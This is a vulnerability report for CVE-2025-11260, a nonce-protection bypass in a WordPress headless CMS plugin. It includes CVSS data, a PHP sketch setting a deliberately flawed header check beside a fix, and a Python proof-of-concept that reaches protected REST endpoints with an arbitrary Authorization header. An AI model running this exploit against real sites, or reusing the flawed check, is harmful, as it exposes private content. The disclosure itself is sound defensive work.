Security Vulnerability Report
CVE-2025-11260 CVSS 5.3 MEDIUM

CVE-2025-11260

Published: 2025-11-13 09:15:47
Last Modified: 2026-04-15 00:35:42

Description

The WP Headless CMS Framework plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.15. This is due to the plugin only checking for the existence of the Authorization header in a request when determining if the nonce protection should be bypassed. This makes it possible for unauthenticated attackers to access content they should not have access to.
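The description above names the root cause as a presence-only check on the Authorization header (CWE-693). The following PHP is an added illustration of that bug class next to a hardened version; it is not the plugin's code, and `my_plugin_validate_token` is a hypothetical helper. It uses the real WordPress `rest_authentication_errors` filter, where returning `true` early tells core that authentication already succeeded and the cookie/nonce check is skipped.

```php
<?php
// Weak pattern: the mere presence of an Authorization header is treated as
// proof of a token-authenticated client, so the nonce check is skipped.
function weak_rest_authentication_errors( $result ) {
    if ( ! empty( $result ) ) {
        return $result; // another handler already decided
    }
    // BUG: only tests that the header exists, never that its value is valid.
    if ( isset( $_SERVER['HTTP_AUTHORIZATION'] ) ) {
        return true; // any header value bypasses nonce protection
    }
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_not_logged_in', 'Authentication required.', array( 'status' => 401 ) );
    }
    return $result;
}

// Hardened pattern: a bearer header only counts if the token actually verifies;
// an invalid token is rejected outright instead of falling back to "trusted".
function hardened_rest_authentication_errors( $result ) {
    if ( ! empty( $result ) ) {
        return $result;
    }
    $header = isset( $_SERVER['HTTP_AUTHORIZATION'] ) ? trim( $_SERVER['HTTP_AUTHORIZATION'] ) : '';
    if ( preg_match( '/^Bearer\s+(\S+)$/i', $header, $m ) ) {
        // Hypothetical helper: returns the user ID the token belongs to, or 0.
        $user_id = my_plugin_validate_token( $m[1] );
        if ( $user_id ) {
            wp_set_current_user( $user_id );
            return true; // token verified: safe to skip the nonce check
        }
        return new WP_Error( 'rest_invalid_token', 'Invalid bearer token.', array( 'status' => 401 ) );
    }
    // No bearer token: fall back to WordPress's normal cookie + nonce authentication.
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_not_logged_in', 'Authentication required.', array( 'status' => 401 ) );
    }
    return $result;
}
add_filter( 'rest_authentication_errors', 'hardened_rest_authentication_errors' );
```

The fix is independent of which token scheme the plugin uses: the decision to skip nonce protection must depend on the outcome of token validation, never on whether a header happened to be sent.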

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Headless CMS Framework < 1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-11260 PoC - WP Headless CMS Framework Authentication Bypass
# Target: WordPress site with WP Headless CMS Framework plugin <= 1.15
target_url = "http://target-wordpress-site.com"

# Endpoints that should require authentication
protected_endpoints = [
    "/wp-json/wp/v2/users",
    "/wp-json/wp/v2/posts?status=private",
    "/wp-json/wp-headless-cms/v1/protected-content",
    "/wp-json/wp/v2/pages?status=draft",
]

print("[*] CVE-2025-11260 Authentication Bypass PoC")
print("[*] Target:", target_url)
print("[*] Testing protected endpoints with Authorization header bypass...\n")

# Normal request without Authorization header (should be blocked)
print("[1] Testing without Authorization header:")
response_normal = requests.get(target_url + protected_endpoints[0])
print(f"    Status: {response_normal.status_code}")
if response_normal.status_code in (401, 403):
    print("    Result: Properly blocked - Authentication required\n")
else:
    print("    Result: Endpoint accessible without auth\n")

# Request WITH Authorization header (bypassing nonce check)
print("[2] Testing WITH Authorization header (bypass attempt):")
headers = {
    "Authorization": "Bearer any_value_here",
    "User-Agent": "Mozilla/5.0",
}
response_bypass = requests.get(target_url + protected_endpoints[0], headers=headers)
print(f"    Status: {response_bypass.status_code}")
if response_bypass.status_code == 200:
    print("    Result: VULNERABLE! Authentication bypassed")
    print("    Response preview:", response_bypass.text[:500])
    print("\n[!] The plugin incorrectly validates only the existence of Authorization header")
    print("[!] Any value in Authorization header bypasses nonce protection")
else:
    print("    Result: Not vulnerable or endpoint not found")

References

https://wordpress.org/plugins/wp-rest-headless/
https://www.wordfence.com/threat-intel/vulnerabilities/id/d6a99806-cb8f-4c12-86ed-2cdbb45ba873?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11260", "sourceIdentifier": "[email protected]", "published": "2025-11-13T09:15:46.623", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Headless CMS Framework plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.15. This is due to the plugin only checking for the existence of the Authorization header in a request when determining if the nonce protection should be bypassed. This makes it possible for unauthenticated attackers to access content they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "references": [{"url": "https://wordpress.org/plugins/wp-rest-headless/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d6a99806-cb8f-4c12-86ed-2cdbb45ba873?source=cve", "source": "[email protected]"}]}}